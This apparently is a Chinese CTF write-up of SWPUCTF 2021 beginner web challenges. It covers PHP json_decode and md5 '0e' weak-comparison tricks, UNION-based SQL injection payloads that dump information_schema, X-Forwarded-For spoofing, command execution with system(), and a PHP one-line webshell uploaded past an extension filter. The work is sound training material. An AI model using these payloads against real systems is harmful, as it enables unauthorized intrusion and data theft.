[SWPUCTF 2021 新生赛]第一波放题(nssctf刷题)
[SWPUCTF 2021 新生赛]jicao
json_decode介绍:
json_decode
(PHP 5 >= 5.2.0, PECL json >= 1.2.0)
json_decode — 对 JSON 格式的字符串进行编码
说明
mixed json_decode ( string $json [, bool $assoc ] )
接受一个 JSON 格式的字符串并且把它转换为 PHP 变量
参数
json
待解码的 json string 格式的字符串。
assoc
当该参数为 TRUE 时,将返回 array 而非 object 。
例如:$json = ‘{“a”:1,“b”:2,“c”:3,“d”:4,“e”:5}’;
<?php
$json = ‘{“a”:1,“b”:2,“c”:3,“d”:4,“e”:5}’;var_dump(json_decode($json))var_dump(json_decode($json,true))["a"] => int(1)
["b"] => int(2)
["c"] => int(3)
["d"] => int(4)
["e"] => int(5)
所以为满足if条件,输出flag,构造:
get:json={"x":"wllm"}
post:id=wllNB 得到flag。
[SWPUCTF 2021 新生赛]easy_md5
<?php highlight_file(__FILE__);include 'flag2.php';if (isset($_GET['name']) && isset($_POST['password'])){$name = $_GET['name'];$password = $_POST['password'];if ($name != $password && md5($name) == md5($password)){echo $flag;}else {echo "wrong!";}}
else {echo 'wrong!';
}
?>
代码审计得知,我们需要让name!=password同时保证md5加密后的name与md5加密的password==.根据php弱类型比较,MD5加密后为0e开头的数字的字符串有:QNKCDZO,s878926199a。
get post传给name与password后得到flag。
[SWPUCTF 2021 新生赛]caidao
直接蚁剑连,密码是wllm。找目录发现在/flag里。
[SWPUCTF 2021 新生赛]easy_sql
ctrl+u查看源码得知,参数是wllm。
通过报错发现存在字符型注入。
1' order by 3--+
用order by 查询字段数,查得字段数为3.
union select 联合查询得知回显位位2,3
-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+ 查询表名
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="test_tb"--+ 查询字段名
-1' union select 1,2,group_concat(id,flag) from test_tb--+
得到flag。
[SWPUCTF 2021 新生赛]Do_you_know_http
刚进去看见,Please use 'WLLM' browser! burp抓包改一下browser。
之后在Response里看见location:./a.php,访问试试。
You can only read this at local!只能本地读取,因此我们更改XFF位127.0.0.1.
得到 Location: ./secretttt.php。访问,得到flag。
[SWPUCTF 2021 新生赛]easyrce
system("ls /")发现flllllaaaaaaggggggg。
再执行system("cat /flllllaaaaaaggggggg"). 得到flag。
[SWPUCTF 2021 新生赛]easyupload1.0
这是一道文件上传题目,我们创建一个空文本文档,然后更改后缀位.jpg绕过检测。
上传文件,并且burp_suite进行抓包。
在文件里写入我们的php一句话木马,并更改filename后缀为php。
上传成功,用蚁剑连接一下。
连接成功,在目录中找flag。发现是错误的flag。
这里之后就不会做了。居然是假的flag。看其他师傅题解后,说是写phpinfo上传就可以看到flag。重新写一下phpinfo上传。
在environment中得到flag。
[SWPUCTF 2021 新生赛]第一波放题(nssctf刷题)相关推荐
- [SWPUCTF 2021 新生赛] 第三波放题
[SWPUCTF 2021 新生赛]easyupload3.0 首先弄个报错出来,随便弄一下,比如弄出一个not found页面,发现是Apache/2.4.7 (Ubuntu) ,既然是 Apach ...
- [SWPUCTF] 2021新生赛之Crypto篇刷题记录(11)
[SWPUCTF] 2021新生赛之Crypto篇刷题记录① [SWPUCTF 2021 新生赛]crypto6 [SWPUCTF 2021 新生赛]ez_caesar [SWPUCTF 2021 新 ...
- [SWPUCTF 2021 新生赛]easyrce
打开题以后发现这个界面,需要构造url的值,然后就想起来看一下目录 ?url=system("ls /");注意:ls后面要有一个空格,然后一个分号结束,这不就出来了flag 1: ...
- [SWPUCTF 2021 新生赛]babyrce
打开界面看见if选项admin=1果断想到用burp抓包然后cookie给admin=1,获取下一步指令 然后url访问, <?php error_reporting(0); highligh ...
- [SWPUCTF 2021 新生赛]
[SWPUCTF 2021 新生赛]jicao 进入环境: <?php highlight_file('index.php'); include("flag.php"); $ ...
- CTF笔记 [SWPUCTF 2021 新生赛]pop
文章目录 一些常见魔术方法 [SWPUCTF 2021 新生赛]pop 总结 这一类题目比较考验对一段代码的逻辑方面的理解,通过利用魔数方法进行互相调用,形成一条链子,利用这条链子将对象联系起来去拿f ...
- [SWPUCTF 2021 新生赛]no_wakeup
[SWPUCTF 2021 新生赛]no_wakeup 考点 反序列化 一.题目 打开题目发现如下代码 <?phpheader("Content-type:text/html;char ...
- [SWPUCTF 2021 新生赛]PseudoProtocols
[SWPUCTF 2021 新生赛]PseudoProtocols 一.题目 二.WP 1.打开题目,发现提示我们是否能找到hint.php,并且发现URL有参数wllm.所以我们尝试利用PHP伪协议 ...
- [SWPUCTF 2021 新生赛]traditional
题目: 西方的二进制数学的发明者莱布尼茨,从中国的八卦图当中受到启发,演绎并推论出了数学矩 阵, 最后创造的二进制数学.二进制数学的诞生为计算机的发明奠定了理论基础.而计算机现在改 变 了我们整个世界 ...
最新文章
- WPF: x名称空间
- java BASE64流 输出图片。
- Java基础点:多线程
- 【转】真正从零开始,TensorFlow详细安装入门图文教程!(帮你完成那个最难的从0到1)...
- 第二届「星斗奖」获奖名单正式公布
- 【物理笑话】学过物理的人才能看懂的笑话,你能看明白几个?
- kali用x-shell连接_良心国产工具,比Xshell好用还免费!
- ht1621b和单片机电平匹配_有备无患,单片机面试问题集
- Python编程进阶,Python如何实现多进程?
- matlab中if可以判断或语句吗,matlab中if 语句后面的判别式不能是算术表达式?或者说变量?...
- 【转】HBase原理和设计
- 时序数据库技术体系-时序数据存储模型设计
- 基于Protues的Arduino学习笔记01-Arduino UNO实验板设计
- moodle安装体验
- TIPTOP实施基础资料收集计划表
- import oracle utility_oracle executing oracle import utility,please wait终极解决方案
- TeamViewer远程连接控制软件
- 高性能核心板IDO-SOM3908-V1:接口丰富,性能更强,速度更快!
- python 期货策略_Python版商品期货跨期布林对冲策略.md
- 更新Win10版本后,wifi图标不见了,并且连接不到wifi和宽带,以及点击网络和Internet闪退的情况